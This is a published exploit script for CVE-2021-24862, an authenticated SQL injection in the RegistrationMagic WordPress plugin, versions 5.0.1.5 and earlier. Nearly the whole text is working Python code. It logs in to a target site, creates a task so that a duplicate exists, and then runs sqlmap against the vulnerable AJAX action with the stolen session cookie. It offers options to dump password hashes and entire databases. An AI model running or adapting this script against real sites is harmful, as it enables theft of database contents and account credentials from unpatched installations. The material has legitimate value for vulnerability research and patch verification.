WordPress RegistrationMagic V 5.0.1.5 SQL Injection

`# Exploit Title: WordPress Plugin RegistrationMagic V 5.0.1.5 - SQL Injection (Authenticated)  
# Date 23.01.2022  
# Exploit Author: Ron Jost (Hacker5preme)  
# Vendor Homepage: https://registrationmagic.com/  
# Software Link: https://downloads.wordpress.org/plugin/custom-registration-form-builder-with-submission-manager.5.0.1.5.zip  
# Version: <= 5.0.1.5  
# Tested on: Ubuntu 20.04  
# CVE: CVE-2021-24862  
# CWE: CWE-89  
# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24862/README.md  
  
'''  
Description:  
The RegistrationMagic WordPress plugin before 5.0.1.6 does not escape user input in its rm_chronos_ajax AJAX action  
before using it in a SQL statement when duplicating tasks in batches, which could lead to a SQL injection issue.  
'''  
  
# Banner:  
import os  
  
banner = '''  
  
_____ _____ _____ ___ ___ ___ ___ ___ ___ ___ ___ ___   
| | | | __|___|_ | |_ |_ | ___|_ | | | . | _|_ |  
| --| | | __|___| _| | | _|_| |_|___| _|_ | . | . | _|  
|_____|\___/|_____| |___|___|___|_____| |___| |_|___|___|___|  
  
[+] RegistrationMagic SQL Injection  
[@] Developed by Ron Jost (Hacker5preme)   
'''  
print(banner)  
import string  
import argparse  
import requests  
from datetime import datetime  
import random  
import json  
import subprocess  
  
# User-Input:  
my_parser = argparse.ArgumentParser(description='Wordpress Plugin RegistrationMagic - SQL Injection')  
my_parser.add_argument('-T', '--IP', type=str)  
my_parser.add_argument('-P', '--PORT', type=str)  
my_parser.add_argument('-U', '--PATH', type=str)  
my_parser.add_argument('-u', '--USERNAME', type=str)  
my_parser.add_argument('-p', '--PASSWORD', type=str)  
args = my_parser.parse_args()  
target_ip = args.IP  
target_port = args.PORT  
wp_path = args.PATH  
username = args.USERNAME  
password = args.PASSWORD  
  
  
print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))  
  
# Authentication:  
session = requests.Session()  
auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'  
check = session.get(auth_url)  
# Header:  
header = {  
'Host': target_ip,  
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',  
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',  
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',  
'Accept-Encoding': 'gzip, deflate',  
'Content-Type': 'application/x-www-form-urlencoded',  
'Origin': 'http://' + target_ip,  
'Connection': 'close',  
'Upgrade-Insecure-Requests': '1'  
}  
  
# Body:  
body = {  
'log': username,  
'pwd': password,  
'wp-submit': 'Log In',  
'testcookie': '1'  
}  
auth = session.post(auth_url, headers=header, data=body)  
  
# Create task to ensure duplicate:  
dupl_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2'  
  
# Header:  
header = {  
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",  
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",  
"Accept-Language": "de,en-US;q=0.7,en;q=0.3",  
"Accept-Encoding": "gzip, deflate",  
"Referer": "http://" + target_ip + ':' + target_port + "/wp-admin/admin.php?page=rm_ex_chronos_edit_task&rm_form_id=2",  
"Content-Type": "application/x-www-form-urlencoded",  
"Origin": "http://" + target_ip,  
"Connection": "close",  
"Upgrade-Insecure-Requests": "1",  
"Sec-Fetch-Dest": "document",  
"Sec-Fetch-Mode": "navigate",  
"Sec-Fetch-Site": "same-origin",  
"Sec-Fetch-User": "?1"  
}  
  
# Body  
body = {  
"rmc-task-edit-form-subbed": "yes",  
"rm-task-slide": "on",  
"rmc_task_name": "Exploitdevelopmenthack" + ''.join(random.choice(string.ascii_letters) for x in range(12)),  
"rmc_task_description": "fiasfdhb",  
"rmc_rule_sub_time_older_than_age": '',  
"rmc_rule_sub_time_younger_than_age": '',  
"rmc_rule_fv_fids[]": '',  
"rmc_rule_fv_fvals[]": '',  
"rmc_rule_pay_status[]": "pending",  
"rmc_rule_pay_status[]": "canceled",  
"rmc_action_user_acc": "do_nothing",  
"rmc_action_send_mail_sub": '',  
"rmc_action_send_mail_body": ''  
}  
  
# Create project  
a = session.post(dupl_url, headers=header, data=body)  
  
  
# SQL-Injection (Exploit):  
exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'  
  
# Generate payload for sqlmap  
print ('[+] Payload for sqlmap exploitation:')  
cookies_session = session.cookies.get_dict()  
cookie = json.dumps(cookies_session)  
cookie = cookie.replace('"}','')  
cookie = cookie.replace('{"', '')  
cookie = cookie.replace('"', '')  
cookie = cookie.replace(" ", '')  
cookie = cookie.replace(":", '=')  
cookie = cookie.replace(',', '; ')  
exploitcode_url = "sqlmap -u http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php'  
exploitcode_risk = ' --level 2 --risk 2 --data="action=rm_chronos_ajax&rm_chronos_ajax_action=duplicate_tasks_batch&task_ids%5B%5D=2"'  
exploitcode_cookie = ' --cookie="' + cookie + '"'  
print(' Sqlmap options:')  
print(' -a, --all Retrieve everything')  
print(' -b, --banner Retrieve DBMS banner')  
print(' --current-user Retrieve DBMS current user')  
print(' --current-db Retrieve DBMS current database')  
print(' --passwords Enumerate DBMS users password hashes')  
print(' --tables Enumerate DBMS database tables')  
print(' --columns Enumerate DBMS database table column')  
print(' --schema Enumerate DBMS schema')  
print(' --dump Dump DBMS database table entries')  
print(' --dump-all Dump all DBMS databases tables entries')  
retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')  
exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + ' ' + retrieve_mode + ' -p task_ids[] -v 0'  
os.system(exploitcode)  
print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))  
  
`